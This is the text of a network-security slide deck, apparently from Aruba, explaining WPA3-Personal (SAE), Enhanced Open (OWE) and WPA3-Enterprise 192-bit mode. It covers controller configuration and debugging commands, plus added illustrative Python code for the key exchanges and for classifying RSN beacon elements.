OWE Transition Mode Packet Capture (screenshot)

Slide 62

Mobility Master Enhanced Open Configuration: create a new SSID profile (screenshot)

Slide 63

Mobility Master Enhanced Open Configuration: Tasks -> Create a new WLAN, steps 1 to 4 (screenshots)

Slide 64

IAP Enhanced Open Configuration: Create a new network, steps 1 to 4 (screenshots)

Slide 65

OWE: Debugging & Troubleshooting

– Enable the below logging on the Aruba controller

– logging user-debug <mac> level debugging

– logging security process authmgr level debugging

– Debug commands on the Aruba controller

– show log security <number>

– show log user-debug <number>

– auth-tracebuf for OWE (the station-up line shows the negotiated wpa3-owe AKM and the aes-ccmp-128 cipher, followed by the four EAPOL-Key messages):

(OWE-VMC) #show auth-tracebuf count 6

Auth Trace Buffer
-----------------
Sep 26 00:57:53  station-down  *   54:27:1e:3e:47:4b  a8:bd:27:cd:e0:a3  -  -
Sep 26 00:57:53  station-up    *   54:27:1e:3e:47:4b  38:17:c3:84:35:42  -  -  wpa3-owe aes-ccmp-128
Sep 26 00:57:53  wpa2-key1     <-  54:27:1e:3e:47:4b  38:17:c3:84:35:42  -  29952
Sep 26 00:57:53  wpa2-key2     ->  54:27:1e:3e:47:4b  38:17:c3:84:35:42  -  31488
Sep 26 00:57:53  wpa2-key3     <-  54:27:1e:3e:47:4b  38:17:c3:84:35:42  -  48896
Sep 26 00:57:53  wpa2-key4     ->  54:27:1e:3e:47:4b  38:17:c3:84:35:42  -  24320

Slide 66

Wi-Fi CERTIFIED WPA3™ - Personal: Simultaneous Authentication of Equals (SAE)

Slide 67

WPA3-Personal: Strong security from weak passwords

– WPA2 Pre-Shared Key (PSK) is replaced by Simultaneous Authentication of Equals (SAE)

– A variant of Dragonfly key exchange (RFC 7664), a password-authenticated key exchange

– Resistant to active attack, passive attack, and offline dictionary attacks

– Already part of 802.11-2016, section 12.4: originally intended for mesh security (802.11s)

– SAE uses new 802.11 authentication frames

– Authentication generates a PMK (the password is no longer fed directly into key derivation; it only selects the password element used in the exchange); association indicates the PMKID

– Key derivation is based on Elliptic Curve Cryptography (ECC) or Finite Field Cryptography (FFC)

– Includes Perfect Forward Secrecy (PFS) and protects from offline brute force attacks

– SAE provisioning is identical to WPA2-PSK

– User enters password just like always but gets improved security behind the scene

– Allows more natural passwords to be used securely

– Mixed (Transition) mode

– WPA3 capable client connects using wpa3-sae (only Advanced Encryption Standard (AES) is allowed)

– Legacy clients connect using wpa2-aes-psk

Slide 68

How WPA2-PSK works: Handshake

Message flow:

  AP  -> STA  beacon / probe response (RSN IE: AKM = PSK)
  STA -> AP   Authentication Request (Open System)
  AP  -> STA  Authentication Response (Open System)
  STA -> AP   Association Request (AKM = PSK)
  AP  -> STA  Association Response (AKM = PSK)
  STA <-> AP  EAPOL-Key 4-way handshake: MIC calculated using the KCK, GTK encrypted using the KEK
  STA <-> AP  Data encrypted with the TK

Key derivation, run identically on both sides:

  Password --> PBKDF2 (known function, SSID as salt) --> PMK
  PMK --> KBKDF (known function; inputs are the two MAC addresses and the two nonces from the handshake) --> PTK, split into KCK, KEK and TK

Abbreviations:

– Password-Based Key Derivation Function 2 (PBKDF2)
– Key-Based Key Derivation Function (KBKDF)
– Pairwise Transient Key (PTK)
– Key-Encrypting Key (KEK)
– Key-Confirmation Key (KCK)
– Temporal Key (TK)
– Message Integrity Code (MIC)

Weakness: both functions are public and the only secret input is the password, so the 4-way handshake (nonces, MAC addresses and MIC) can be sniffed and stored for an offline dictionary attack. Each candidate password is pushed through PBKDF2 and the KBKDF and the resulting KCK is checked against the captured MIC, with no further interaction with the network.

Slide 69

Simultaneous Authentication of Equals (SAE): Handshake

Message flow:

  AP  -> STA  beacon / probe response (RSN IE: AKM = SAE; PMF with BIP-CMAC-128 (AES-128-CMAC) as group management cipher)
  STA -> AP   Authentication (SAE Commit): SAE, SEQ1, ECDH group, scalar_STA, P2_STA
  AP  -> STA  Authentication (SAE Commit): SAE, SEQ1, ECDH group, scalar_AP, P2_AP
  STA -> AP   Authentication (SAE Confirm): SAE, SEQ2, Confirm_STA
  AP  -> STA  Authentication (SAE Confirm): SAE, SEQ2, Confirm_AP
  STA -> AP   Association Request (AKM = SAE)
  AP  -> STA  Association Response (AKM = SAE)
  STA <-> AP  EAPOL-Key 4-way handshake, keyed with the PMK
  STA <-> AP  Traffic keys in use

Commit, computed on each side (shown for the AP; the STA does the same with its own random values):

  Generate the password element PE from the password (a point on the curve)
  Random p_AP and m_AP; scalar_AP = (p_AP + m_AP) mod r
  P2_AP = inverse(m_AP.PE)

Shared secret, after receiving the peer's Commit:

  AP:  K = p_AP.(scalar_STA.PE + P2_STA) = p_AP.((p_STA + m_STA).PE - m_STA.PE) = p_AP.p_STA.PE
  STA: K = p_STA.(scalar_AP.PE + P2_AP) = p_STA.((p_AP + m_AP).PE - m_AP.PE) = p_STA.p_AP.PE
  k = F(K), mapping the point to a number

Confirm and PMK:

  Confirm_AP  = hash(k, unique values of the exchange)
  Confirm_STA = hash(k, unique values of the exchange), over the same values in the other order, so Confirm_AP ≠ Confirm_STA
  Each side verifies the peer's Confirm: mutual authentication, a zero-knowledge proof of the password
  PMK = hash(k, (scalar_AP + scalar_STA) mod r)

Only scalars and points are sent; without the password an observer cannot obtain PE, and without p_AP or p_STA it cannot obtain K, so a captured exchange gives nothing to test candidate passwords against offline.
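Both exchanges described above, OWE from slide 55 and SAE from this slide, carried out end to end on the NIST P-256 curve (IANA group 19) as an added example in Python. This is not code from the presentation, from Aruba or from the RFCs; it uses pure-Python elliptic-curve arithmetic and, by assumption, an uncompressed point encoding, a simplified hunting-and-pecking loop for the password element, and a simplified KDF and Confirm construction (the real ones are in IEEE 802.11-2016 12.4 and RFC 8110 4.4). The MAC addresses are the ones from the auth-tracebuf slide; the passwords are made up.

```python
"""OWE (RFC 8110) and SAE/Dragonfly (RFC 7664) key agreement on NIST P-256 (IANA group 19).
Added example, not code from Aruba or the standards: pure-Python EC arithmetic; point encoding,
hunting-and-pecking and the SAE KDF/confirm are simplified where noted."""
import hashlib, hmac, secrets

# P-256 domain parameters: y^2 = x^3 - 3x + B over GF(P); base point G has prime order R
P = 0xffffffff00000001000000000000000000000000ffffffffffffffffffffffff
B = 0x5ac635d8aa3a93e7b3ebbd55769886bc651d06b0cc53b0f63bce3c3e27d2604b
R = 0xffffffff00000000ffffffffffffffffbce6faada7179e84f3b9cac2fc632551
G = (0x6b17d1f2e12c4247f8bce6e563a440f277037d812deb33a0f4a13945d898c296,
     0x4fe342e2fe1a7f9b8ee7eb4a7c0f9e162bce33576b315ececbb6406837bf51f5)

def ec_add(p1, p2):
    """Affine point addition; None is the point at infinity."""
    if p1 is None or p2 is None:
        return p2 if p1 is None else p1
    (x1, y1), (x2, y2) = p1, p2
    if x1 == x2 and (y1 + y2) % P == 0:
        return None
    num, den = (3 * x1 * x1 - 3, 2 * y1) if p1 == p2 else (y2 - y1, x2 - x1)
    lam = num * pow(den, -1, P) % P
    x3 = (lam * lam - x1 - x2) % P
    return x3, (lam * (x1 - x3) - y1) % P

def ec_mul(k, pt):
    """Double-and-add k.pt (not constant time: illustration only)."""
    acc = None
    while k:
        if k & 1:
            acc = ec_add(acc, pt)
        pt, k = ec_add(pt, pt), k >> 1
    return acc

def i2b(n): return n.to_bytes(32, "big")
def enc(pt): return i2b(pt[0]) + i2b(pt[1])   # uncompressed x|y; the DH Parameter element carries a compressed form

# ---- OWE: unauthenticated ECDH carried in the Association Request/Response ----
def owe_keypair():
    """STA: random c, C = c.G; AP: random a, A = a.G."""
    priv = secrets.randbelow(R - 1) + 1
    return priv, ec_mul(priv, G)

def owe_pmk(priv, peer_pub, client_pub, ap_pub):
    """RFC 8110 4.4: z = x of the shared point, PMK = HKDF(salt C|A, ikm z, "OWE Key Generation"),
    PMKID = Truncate-128(SHA-256(C|A)). Both sides agree because c.A = a.C = c.a.G."""
    z = i2b(ec_mul(priv, peer_pub)[0])
    c_a = enc(client_pub) + enc(ap_pub)
    prk = hmac.new(c_a, z, hashlib.sha256).digest()                          # HKDF-Extract
    pmk = hmac.new(prk, b"OWE Key Generation\x01", hashlib.sha256).digest()  # HKDF-Expand, one block
    return pmk, hashlib.sha256(c_a).digest()[:16]

def run_owe():
    """Full OWE exchange; True when STA and AP derive the same PMK and PMKID."""
    c, C = owe_keypair()
    a, A = owe_keypair()
    return owe_pmk(c, A, C, A) == owe_pmk(a, C, C, A)

# ---- SAE: Dragonfly password-authenticated key exchange ----
def sae_password_element(password, mac1, mac2):
    """Simplified hunting-and-pecking: hash password|counter to an x and take the first x on the curve.
    The standard uses a KDF and a fixed iteration count to blunt timing side channels."""
    macs = max(mac1, mac2) + min(mac1, mac2)
    for counter in range(1, 256):
        seed = hmac.new(macs, password + bytes([counter]), hashlib.sha256).digest()
        x = int.from_bytes(seed, "big") % P
        y2 = (pow(x, 3, P) - 3 * x + B) % P
        y = pow(y2, (P + 1) // 4, P)   # square root, valid because P = 3 mod 4
        if y * y % P == y2:
            return x, y
    raise ValueError("no password element found")

def sae_commit(pe):
    """Commit: random p, m; scalar = (p + m) mod r; P2 = inverse(m.PE) = -(m.PE). p stays private."""
    p_rand, m_mask = secrets.randbelow(R - 2) + 2, secrets.randbelow(R - 2) + 2
    m_pe = ec_mul(m_mask, pe)
    return p_rand, (p_rand + m_mask) % R, (m_pe[0], -m_pe[1] % P)

def sae_keys(p_rand, my_scalar, peer_scalar, peer_elem, pe):
    """K = p.(scalar'.PE + P2') = p.p'.PE; k = F(K); KCK and PMK = hash(k, (scalar + scalar') mod r), KDF simplified."""
    k = i2b(ec_mul(p_rand, ec_add(ec_mul(peer_scalar, pe), peer_elem))[0])
    ctx = i2b((my_scalar + peer_scalar) % R)
    return (hmac.new(k, b"SAE KCK" + ctx, hashlib.sha256).digest(),
            hmac.new(k, b"SAE PMK" + ctx, hashlib.sha256).digest())

def sae_confirm(kck, own_scalar, own_elem, peer_scalar, peer_elem):
    """Confirm token; the sender lists its own commit first, so Confirm_AP != Confirm_STA."""
    return hmac.new(kck, i2b(own_scalar) + enc(own_elem) + i2b(peer_scalar) + enc(peer_elem), hashlib.sha256).digest()

def run_sae(ap_password, sta_password):
    """Run SAE between an AP and a STA; returns (both Confirms verified, PMKs equal)."""
    ap_mac, sta_mac = bytes.fromhex("3817c3843542"), bytes.fromhex("54271e3e474b")  # MACs from the auth-tracebuf slide
    pe_ap, pe_sta = (sae_password_element(pw, ap_mac, sta_mac) for pw in (ap_password, sta_password))
    p_ap, s_ap, e_ap = sae_commit(pe_ap)
    p_sta, s_sta, e_sta = sae_commit(pe_sta)
    kck_ap, pmk_ap = sae_keys(p_ap, s_ap, s_sta, e_sta, pe_ap)
    kck_sta, pmk_sta = sae_keys(p_sta, s_sta, s_ap, e_ap, pe_sta)
    conf_sta = sae_confirm(kck_sta, s_sta, e_sta, s_ap, e_ap)   # sent by the STA
    conf_ap = sae_confirm(kck_ap, s_ap, e_ap, s_sta, e_sta)     # sent by the AP
    ok_at_ap = hmac.compare_digest(conf_sta, sae_confirm(kck_ap, s_sta, e_sta, s_ap, e_ap))
    ok_at_sta = hmac.compare_digest(conf_ap, sae_confirm(kck_sta, s_ap, e_ap, s_sta, e_sta))
    return ok_at_ap and ok_at_sta, pmk_ap == pmk_sta
```

run_owe() returns True although neither side proved anything about itself, which is the whole of what OWE offers. run_sae(b"correct horse", b"correct horse") returns (True, True); with two different passwords the Confirm values fail on both sides and the PMKs differ, and the values that went over the air (scalars and elements) give an observer no way to test a guess.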

Slide 70

SAE Transition Mode Connection (screenshots: AP BSS Table, AP Association Table, auth-tracebuf output)

Slide 71

SAE Mixed Mode Beacon: SAE mixed mode is announced in Beacons and Probe Responses (screenshot)

Slide 72

SAE Authentication Commit and Confirm (screenshots: SAE Auth Commit, SAE Auth Confirm)

Slide 73

WPA3 SAE Association Request: SAE client association request (screenshot)

Slide 74

WPA3 SAE Association Request: WPA2 client association request in transition mode (screenshot)

Slide 75

Mobility Master SAE Configuration: Tasks -> Create a new WLAN, steps 1 to 4 (screenshots)

Slide 76

Mobility Master SAE Configuration: Transition mode enabled by default

wlan ssid-profile "WPA3-SAE-transition"
  essid "WPA3-SAE-transition"
  opmode wpa3-sae-aes
!
wlan ssid-profile "WPA3-SAE-only"
  essid "WPA3-SAE"
  opmode wpa3-sae-aes
  no wpa3-transition
!

Slide 77

IAP SAE Configuration: Create a new network, steps 1 to 4 (screenshots)

Slide 78

Wi-Fi CERTIFIED WPA3™ - Enterprise

Slide 79

WPA3-Enterprise

Basic Mode

– Same as WPA2-Enterprise + 802.11w (MFPR=0, MFPC=1)

– No transition mode

192-bit mode a.k.a. Suite-B/CNSA

– 802.11w mandatory

– Suite-B compatible 802.1X negotiated between STA and RADIUS server

– Policy is enforced by the EAP/RADIUS server

– New RADIUS attributes

– Authenticator (controller) indicates that the Suite-B AKM was negotiated

– Supported only in tunnel mode on CAP and RAP

– 4-way handshake and KDF use SHA-384 with the Suite-B AKM

Variants of WPA3-Enterprise and their suite selectors. All selectors use OUI 00-0F-AC, but AKM selectors and cipher suite selectors are separate namespaces: 00-0F-AC:12 is the Suite-B AKM in row 1 and the BIP-GMAC-256 cipher suite in row 4.

192-bit level (ECC)

1) AKM 00-0F-AC:12: EAP-TLS using ECDH and ECDSA with curve P-384, SHA-384 for key derivation

2) Pairwise cipher suite 00-0F-AC:9: AES-GCM-256 (GCMP-256)

3) Group data cipher suite 00-0F-AC:9: AES-GCM-256 (GCMP-256)

4) Group management cipher suite 00-0F-AC:12: BIP-GMAC-256

192-bit level (RSA)

1) AKM 00-0F-AC:12: EAP-TLS using ECDH and RSA (3072-bit or larger), SHA-384 for key derivation

2) Pairwise cipher suite 00-0F-AC:9: AES-GCM-256 (GCMP-256)

3) Group data cipher suite 00-0F-AC:9: AES-GCM-256 (GCMP-256)

4) Group management cipher suite 00-0F-AC:12: BIP-GMAC-256

Certificate chain validation is mandatory and is tested during certification testing
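How these selectors look on the air, as an added example (Python, not Aruba code): a decoder for the RSN element (element ID 48) carried in beacons and probe responses, followed by a classifier that names the advertised mode (Enhanced Open, SAE transition mode as on the mixed-mode beacon slide, SAE only, Suite-B 192-bit) and lists the policy findings a reviewer would raise, such as a 192-bit AKM paired with the wrong ciphers or a WPA3 mode without MFPR. The sample elements are hand-built from the selector values on this slide, not captured frames, and the mode names and finding texts are this example's own.

```python
"""Decode the RSN element (element ID 48) from a beacon or probe response and classify the security mode.
Added example, not Aruba code; the sample elements below are hand-constructed, not captured frames."""
import struct

OUI = b"\x00\x0f\xac"
CIPHERS = {1: "WEP-40", 2: "TKIP", 4: "CCMP-128", 5: "WEP-104", 6: "BIP-CMAC-128", 8: "GCMP-128",
           9: "GCMP-256", 10: "CCMP-256", 11: "BIP-GMAC-128", 12: "BIP-GMAC-256", 13: "BIP-CMAC-256"}
AKMS = {1: "802.1X", 2: "PSK", 3: "FT-802.1X", 4: "FT-PSK", 5: "802.1X-SHA256", 6: "PSK-SHA256", 8: "SAE",
        9: "FT-SAE", 11: "SuiteB-SHA256", 12: "SuiteB-SHA384", 13: "FT-802.1X-SHA384", 18: "OWE"}


def _suite(body, off, table):
    """One 4-byte selector: OUI (00-0F-AC for IEEE-defined suites) followed by the suite type."""
    oui, typ = body[off:off + 3], body[off + 3]
    return table.get(typ, f"unknown-{typ}") if oui == OUI else f"vendor-{oui.hex()}-{typ}"


def _suite_list(body, off, table):
    (count,) = struct.unpack_from("<H", body, off)
    return [_suite(body, off + 2 + 4 * i, table) for i in range(count)], off + 2 + 4 * count


def parse_rsn(ie):
    """id(1) len(1) version(2) group(4) [pairwise list] [AKM list] [caps(2)] [PMKID list] [group mgmt(4)];
    every field after the group cipher is optional, so parsing stops at the end of the element."""
    if len(ie) < 2 or ie[0] != 48 or ie[1] != len(ie) - 2:
        raise ValueError("not a well-formed RSN element")
    body = ie[2:]
    r = {"version": struct.unpack_from("<H", body, 0)[0], "group": _suite(body, 2, CIPHERS),
         "pairwise": [], "akm": [], "mfpc": False, "mfpr": False, "group_mgmt": None}
    off = 6
    if off + 2 <= len(body):
        r["pairwise"], off = _suite_list(body, off, CIPHERS)
    if off + 2 <= len(body):
        r["akm"], off = _suite_list(body, off, AKMS)
    if off + 2 <= len(body):
        caps = struct.unpack_from("<H", body, off)[0]
        r["mfpr"], r["mfpc"], off = bool(caps & 0x40), bool(caps & 0x80), off + 2   # RSN Capabilities bits 6, 7
    if off + 2 <= len(body):
        off += 2 + 16 * struct.unpack_from("<H", body, off)[0]                       # skip the PMKID list
    if off + 4 <= len(body):
        r["group_mgmt"] = _suite(body, off, CIPHERS)
    return r


def classify(r):
    """Name the mode the BSS advertises and list the policy findings a reviewer would raise."""
    akm, findings = set(r["akm"]), []
    if {"TKIP", "WEP-40", "WEP-104"} & (set(r["pairwise"]) | {r["group"]}):
        findings.append("legacy cipher (TKIP/WEP) offered")
    if "OWE" in akm:
        mode = "Enhanced Open (OWE)"
    elif "SAE" in akm and "PSK" in akm:
        mode = "WPA3-SAE transition mode"
        if not r["mfpc"]:
            findings.append("transition mode must advertise MFPC=1")
    elif "SAE" in akm:
        mode = "WPA3-SAE only"
    elif "SuiteB-SHA384" in akm:
        mode = "WPA3-Enterprise 192-bit"
        if r["pairwise"] != ["GCMP-256"] or r["group"] != "GCMP-256" or r["group_mgmt"] != "BIP-GMAC-256":
            findings.append("192-bit mode requires GCMP-256 pairwise/group and BIP-GMAC-256 group management")
    elif akm & {"802.1X", "802.1X-SHA256", "FT-802.1X"}:
        mode = "802.1X (WPA2/WPA3-Enterprise)"
        if not r["mfpc"]:
            findings.append("no PMF advertised (MFPC=0)")
    elif akm & {"PSK", "PSK-SHA256", "FT-PSK"}:
        mode = "WPA2-PSK"
        findings.append("4-way handshake exposed to offline dictionary attack")
    else:
        mode = "other/unknown"
    if mode in ("Enhanced Open (OWE)", "WPA3-SAE only", "WPA3-Enterprise 192-bit") and not r["mfpr"]:
        findings.append(f"{mode} requires PMF (MFPR=1)")
    if "SAE" in akm and set(r["pairwise"]) - {"CCMP-128"}:
        findings.append("WPA3-SAE clients may only use CCMP-128 (AES)")
    return mode, findings


# Hand-constructed RSN elements (not captures): 0x30, length, then the fields in the order parse_rsn reads them
SAMPLES = {
    "sae_transition": bytes.fromhex("301e0100000fac040100000fac040200000fac02000fac0880000000000fac06"),
    "suite_b_192":    bytes.fromhex("301a0100000fac090100000fac090100000fac0cc0000000000fac0c"),
    "owe":            bytes.fromhex("301a0100000fac040100000fac040100000fac12c0000000000fac06"),
    "wpa2_psk_tkip":  bytes.fromhex("30180100000fac020200000fac02000fac040100000fac020000"),
}

if __name__ == "__main__":
    for name, ie in SAMPLES.items():
        print(name, classify(parse_rsn(ie)))
```

Run against a live capture, the same two functions applied to each beacon's RSN element give an inventory of which SSIDs still advertise PSK or TKIP next to SAE, and whether a Suite-B SSID really carries GCMP-256 and BIP-GMAC-256 rather than just the AKM.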

Slide 80

WPA3-Enterprise 192-Bit/CNSA mode: RADIUS support required

– Permitted EAP (TLS) cipher suites

– TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384: ECDHE and ECDSA using the 384-bit prime modulus curve P-384

– TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384: ECDHE using the 384-bit prime modulus curve P-384, RSA ≥ 3072-bit modulus

– TLS_DHE_RSA_WITH_AES_256_GCM_SHA384: RSA ≥ 3072-bit modulus, DHE ≥ 3072-bit modulus

– WLAN-Reason-Code (RADIUS attribute type 185, RFC 7268) is sent in the RADIUS response (Access-Reject) when EAP authentication fails, carrying the 802.11 reason code for the failure:

Reason code  Name                             Meaning
18           REASON_INVALID_GROUP_CIPHER      Invalid group cipher
19           REASON_INVALID_PAIRWISE_CIPHER   Invalid pairwise cipher
20           REASON_INVALID_AKMP              Invalid AKMP
23           802_1_X_AUTH_FAILED              IEEE 802.1X authentication failed
24           REASON_CIPHER_OUT_OF_POLICY      Cipher suite rejected because of the security policy (e.g. the group management cipher suite does not match)

– ClearPass Policy Manager (CPPM) 6.8 or later supports WPA3-Enterprise 192-bit mode

Slide 81

WPA3-Enterprise: Suite-B Probe Response (screenshot)

Slide 82

WPA3-Enterprise: Suite-B Association Request (screenshot of a Suite-B client association request)

Slide 83

WPA3-Enterprise: Suite-B auth-tracebuf (screenshot)

Slide 84

Mobility Master WPA3-Enterprise Configuration: Tasks -> Create a new WLAN, steps 1 to 4 (screenshots)

Slide 85

IAP WPA3-Enterprise Configuration: Create a new network, steps 1 to 4 (screenshots)

Slide 86

WPA3-Enterprise: Logging/Debugging

• The debugging and logs used for the WPA2 opmodes apply unchanged; no new logging is introduced for WPA3-Enterprise

• logging security process authmgr level debugging

• logging security process authmgr subcat aaa level debugging

• logging user level debugging

Slide 87

WPA3-Enterprise: Client connectivity

– A WPA3 Suite-B capable client connects with the required selectors (Suite-B AKM, GCMP-256, BIP-GMAC-256)

– The association table flags the client as an Enterprise client with 802.11w capability

Slide 88

Wi-Fi Protected Access® update: Summary

– WPA3™

– WPA3-SAE™ (mandatory)

– WPA3-Enterprise™ (mandatory)

– WPA3-Enterprise™ 192-Bit/Suite-B (optional)

– 802.11w (mandatory)

– Verification of certificate chain checking

– Enhanced Open™

– Migration from Open to OWE (encryption by default)

– Encrypted walled gardens

– Combine with strong profiling

– Basic IoT, Guest, BYOD

– Easy Connect™

– A new way to connect headless devices, e.g. IoT

Slide 89

Thank you
[email protected]

Slide 90

References

– OWE

– Harkins, D. and W. Kumari, “Opportunistic Wireless Encryption”, RFC 8110, March 2017

– SAE

– IEEE 802.11-2016

– Harkins, D., “The Dragonfly Key Exchange”, RFC 7664, November 2015

– Suite B

– US National Security Agency, “NSA Suite B Cryptography”, January 2009

– DPP

– Wi-Fi Alliance, “Device Provisioning Protocol Technical Specification”, v0.2.8, December 2017

– Harkins, D., “The Public Key Exchange”, draft-harkins-pkex-05, January 2018

– Stajano, F. and R. Anderson, “The Resurrecting Duckling: Security Issues for Ad-hoc Wireless Networks”, Lecture Notes in Computer Science, vol. 1796, Springer, Berlin, Heidelberg, 1999

– FILS

– IEEE 802.11ai-2016, “Amendment 1: Fast Initial Link Setup”, 2016

Slide 91

References

– https://wlan1nde.wordpress.com/2018/09/14/wpa3-improving-your-wlan-security/

– https://www.mathyvanhoef.com/2018/06/wpa3-missed-opportunity.html

– https://sarwiki.informatik.hu-berlin.de/WPA3_Dragonfly_Handshake

– http://andrea.corbellini.name/2015/05/17/elliptic-curve-cryptography-a-gentle-introduction/

